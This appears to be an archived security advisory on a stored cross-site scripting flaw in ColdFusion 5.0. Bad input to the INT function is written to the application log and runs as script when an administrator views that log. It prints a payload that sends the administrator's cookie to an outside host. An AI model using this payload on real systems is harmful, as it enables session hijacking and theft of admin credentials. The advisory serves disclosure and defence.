COMMAND

	Cross-site scripting vulnerability in CF

SYSTEMS AFFECTED

	CF 5.0

PROBLEM

	KiLL CoLe [killcole@yahoo.com] says :
	
	The coldfusion administrator allows you to  view  your  application  log
	via your web browser.  Under  certain  conditions,  it  is  possible  to
	remotely alter coldfusions application log.  take the following code:
	
	<CFQUERY NAME="qProducts" DATASOURCE="#datasrc#">
	   SELECT * FROM Products
	   Where ProductId = #int(url.productid)#
	</CFQUERY>
	
	if the INT function encounters a value that is not  numeric,  it  throws
	an exception and writes the value that was  passed  to  application.log.
	Should an unsuspecting administrator view the log  file  via  their  web
	browser, script could be executed.  Analyze this code:
	
	if url.productid (from the above example) were passed in as:
	
	<iframe name="frame1" width="0" height="0"></iframe>
	<script>document.frame1.location="http://www.domain.com/index.cfm?stealcookie="
	+ document.cookie</script>
	
	this would enable an attacker to  steal  the  value  of  the  coldfusion
	administrators cookie. Decrypting the  coldfusion  admin's  password  is
	well documented, and exposes a mild-moderate threat to server security.
	
	**NOTE: there are  dozens  of  other  functions  that  throw  exceptions
	similar to the INT function.

SOLUTION

	A patch should be available anytime soon now